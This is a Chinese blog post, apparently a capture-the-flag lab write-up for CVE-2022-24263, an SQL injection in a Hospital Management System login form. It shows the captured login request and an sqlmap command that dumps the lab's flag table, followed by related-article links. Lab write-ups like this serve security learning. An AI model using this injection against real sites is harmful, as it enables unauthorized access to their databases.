[春秋云镜]CVE-2022-24263

已于 2022-12-03 21:21:26 修改
阅读量708 收藏
点赞数
分类专栏: 春秋云镜 靶场 文章标签: 安全 web安全
于 2022-11-29 21:28:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niubi707/article/details/128105661
版权
本文介绍了春秋云镜靶场中的一个SQL注入问题,靶场地址为http://eci-2ze6z6gdw8c1bleut7gc.cloudeci1.ichunqiu.com/。文中提到登录接口存在注入漏洞,可以使用SQLMAP进行测试。作者强调所有渗透测试需获取授权,不得用于非法用途。
摘要由CSDN通过智能技术生成

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!

靶场介绍

Hospital Management System sqli

春秋云镜开启靶场:

http://eci-2ze6z6gdw8c1bleut7gc.cloudeci1.ichunqiu.com/

登录处存在注入

 登录抓包 SQLMAP可以直接跑

POST /func1.php HTTP/1.1
Host: eci-2ze6z6gdw8c1bleut7gc.cloudeci1.ichunqiu.com
Content-Length: 45
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2ze6z6gdw8c1bleut7gc.cloudeci1.ichunqiu.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2ze6z6gdw8c1bleut7gc.cloudeci1.ichunqiu.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.2.1845746631.1669726499; _gid=GA1.2.1206934793.1669726499
Connection: close

username3=admin&password3=admin&docsub1=Login

└─# sqlmap -r /root/桌面/post2.txt -D ctf -T flag -C flag --dump --batch

春天11-
关注
专栏目录
Elite Graphix Elite Cms SQL注入漏洞(CVE-2022-24263
千寻的博客
12-09 1884
发现医院管理系统v4.0通过电子邮件参数在`/Hospital-Management-System-master/func. php`中包含SQL注入漏洞。 `Hospital Management System sqli`
记录春秋云镜CVE-2022-32991复现过程
as_adwd的博客
03-19 276
个人记录(新手小白)春秋云镜CVE的复现过程
春秋云境:CVE-2022-24263
一只爱吃橙子的羊
12-02 979
Hospital Management System sqli
【内网渗透】最保姆级的春秋云镜Exchange打靶笔记
最新发布
uuzeray的博客
09-07 505
fscan扫外网访问8000端口->官方网站admin/123456弱口令打/user/list?search=的jdbc+fj反序列化vps搭一个MySQL_Fake_Server。
CVE-2022-24263
m0_51674437的博客
07-21 206
cve-2022-24263漏洞复现和代码审计
春秋云境】CVE-2022-24263靶场WP和CVE-2022-24223靶场WP
果粒程
12-01 579
春秋云境】CVE-2022-24263靶场WP和CVE-2022-24223靶场WP
春秋云境】CVE-2022-24263复现
小高工作室
12-01 292
因为春秋云境是用容器系列的,所以有时会很慢,重复sqlmap几次就行,这跟网络有关。而且运行时候最好关闭fiddler,不然也会很慢。退出账号时候自动跳转到index1.php。有注册,随便注册一个账号。退出登录后重新进入后台。打开fiddler抓包。
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
春秋云镜CVE-2022-30887
09-05
春秋云镜CVE-2022-30887是指Pharmacy Management System文件上传漏洞,该漏洞的CVE编号为CVE-2022-30887。此漏洞可能允许攻击者通过上传恶意文件利用系统中的漏洞。请注意,由于未提供更多信息,我无法提供详细的...
春秋云镜CVE-2022-30887用蚁剑
09-05
- *2* [春秋云镜CVE-2022-32992](https://blog.csdn.net/qq_45317844/article/details/128552593)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
春秋云镜 CVE-2022-24263
qq_22002773的博客
07-05 164
春秋云镜 CVE-2022-24263
春秋云境CVE-2022-24263
m0_64432806的博客
03-23 334
春秋云境CVE-2022-24263 Hospital Management System sqli
春秋云镜-内网极限挑战赛-Exchange
M1n9K1n9的博客
04-08 2421
看到奖品还有证书,还涉及oscp方面的东西,过来打打 感谢TryHackMe Exchange 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag,分布于不同的靶机。 由于是付费的,时间就是金钱,为了节省点钱,我只好利用wp来进行半引导式渗透 借此来复习一下TryHackMe
春秋云镜-【仿真场景】Exchange writeup
渗透测试研究中心
03-07 818
0x00 IntroOSCP 渗透风格,脱离C2和MSF之类的工具Box 难度不高0x01 InfoTag: JDBC, Exchange, NTLM, Coerce Authentication, DCSync0x02 ReconTarget external IP39.98.179.149Nmap results直接关注8000端口,前面我已经怼过80了,没东西直接过华夏ERP,有很多漏洞的...
[春秋云镜]CVE-2022-22963
niubi707的博客
11-29 688
[春秋云镜]CVE-2022-22963复现
『Java CVECVE-2022-42889: Apache Commons Text RCE(Text4Shell)
Ho1aAs‘s Blog
10-24 2249
# 影响版本 Apache Commons Text ≤ 1.9 # 漏洞原理 插值器允许执行script 原理跟CVE-2022-33980: Apache Commons Configuration读文件RCE一样
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值